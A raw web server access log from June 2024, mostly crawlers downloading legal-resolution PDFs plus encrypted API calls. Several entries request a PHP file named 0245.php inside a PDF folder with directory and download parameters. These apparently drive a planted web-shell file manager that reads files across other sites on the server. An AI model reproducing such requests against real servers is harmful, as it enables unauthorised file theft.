186.102.2.168 - - [22/Jun/2024:03:54:42 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:54:42 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19dsscVzrDjOP+eAub7sZkRrMCtr4r8VXjU0WBtVqnqB6QmSKcskAZSAOG0R94BqY/wxnZrrlw6EBiA3GSeI5BoHTd6yDJFCkrdS2z9n62lC1nfC4SQp4TtNYrE3ua0XyT3zKJj1MA0M2swpy1TDb8jZ8E2ewe+NO0=&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:54:42 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Jjnq5q0FpcvKhPgkX4GtSydFb9vg3YOZTxIePE6fRTrntgwoAXYehaqlznvn9Adw0EWzU7LC9THs9Hv6HzocfkTmrofoMXMATAQd8a93YslSrQFORqvxppyAmdxRCHm6LYWCUuYoQf//6a0Fjluam9Zj+2Gn2DSA=&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
47.128.120.99 - - [22/Jun/2024:03:54:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4485.pdf&ft=download&white=1 HTTP/1.1" 200 351911
23.22.35.162 - - [22/Jun/2024:03:54:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/5113.pdf HTTP/1.1" 200 581093
186.102.2.168 - - [22/Jun/2024:03:54:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+1CoNqh6AL9VYNH7AhPtXjkOm+kFB01ZlRtEmMRL/iwD7Ch0iRdLzKWAipvchCheEY98GCnlCDDNe8rZSanqAFw3xC3aI/eKiAwxob026Y6uaSQ09k/VVKsO9KtNftNfZUG/NoCyAj9CSg24JgYO6YEX4JWGYeF2A=&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:54:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/1njsjBPillYMb4jN2rF3y3J1qodziBLGPXe09zuoOGz7oFAc1fz9pYsKc4UUe32N3BdEq7x51oH156CCLVAYMXFBAdV8TFKeKpF2lcRS0YNf6LV5GyIrIdzRpiK1k78XBi2Sy1m46AlzGS/pYiewmuYpiQmLhbUK+2Ekq4I9XQCwCOxJrFw8IbPuJvJDps3l5jLSPCuTG1g==&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
3.224.220.101 - - [22/Jun/2024:03:54:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/3748.pdf HTTP/1.1" 200 309837
3.224.220.101 - - [22/Jun/2024:03:54:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/5112.pdf HTTP/1.1" 200 374660
52.70.240.171 - - [22/Jun/2024:03:54:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/5111.pdf HTTP/1.1" 200 573382
23.22.35.162 - - [22/Jun/2024:03:54:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/3747.pdf HTTP/1.1" 200 351602
52.70.240.171 - - [22/Jun/2024:03:55:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/5110.pdf HTTP/1.1" 200 430055
3.224.220.101 - - [22/Jun/2024:03:55:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/3744.pdf HTTP/1.1" 200 427548
3.224.220.101 - - [22/Jun/2024:03:55:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/5109.pdf HTTP/1.1" 200 362396
47.128.21.86 - - [22/Jun/2024:03:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=showcode.php&ft=download&white=1 HTTP/1.1" 200 712
3.224.220.101 - - [22/Jun/2024:03:55:15 -0500] "GET /BLA/resoluciones/AUTOS%202020/3743.pdf HTTP/1.1" 200 407108
3.224.220.101 - - [22/Jun/2024:03:55:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/5108.pdf HTTP/1.1" 200 367836
201.245.192.253 - - [22/Jun/2024:03:55:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:03:55:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/3742.pdf HTTP/1.1" 200 414861
52.70.240.171 - - [22/Jun/2024:03:55:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/5107.pdf HTTP/1.1" 200 922492
3.224.220.101 - - [22/Jun/2024:03:55:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/3741.pdf HTTP/1.1" 200 407911
52.70.240.171 - - [22/Jun/2024:03:55:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/5106.pdf HTTP/1.1" 200 523798
3.224.220.101 - - [22/Jun/2024:03:55:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/3738.pdf HTTP/1.1" 200 268778
3.224.220.101 - - [22/Jun/2024:03:55:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/5103.pdf HTTP/1.1" 200 372698
3.224.220.101 - - [22/Jun/2024:03:55:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/3736.pdf HTTP/1.1" 200 361512
47.128.53.11 - - [22/Jun/2024:03:55:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=arrows-2x.png&ft=download&white=1 HTTP/1.1" 200 863
52.70.240.171 - - [22/Jun/2024:03:55:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/5100.pdf HTTP/1.1" 200 355213
172.22.2.4 - - [22/Jun/2024:03:54:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.224.220.101 - - [22/Jun/2024:03:55:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/3734.pdf HTTP/1.1" 200 1970689
52.70.240.171 - - [22/Jun/2024:03:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/5098.pdf HTTP/1.1" 200 601033
52.70.240.171 - - [22/Jun/2024:03:56:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/5097.pdf HTTP/1.1" 200 358821
52.70.240.171 - - [22/Jun/2024:03:56:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/5095.pdf HTTP/1.1" 200 356872
23.22.35.162 - - [22/Jun/2024:03:56:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/5093.pdf HTTP/1.1" 200 369745
3.224.220.101 - - [22/Jun/2024:03:56:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/5092.pdf HTTP/1.1" 200 359648
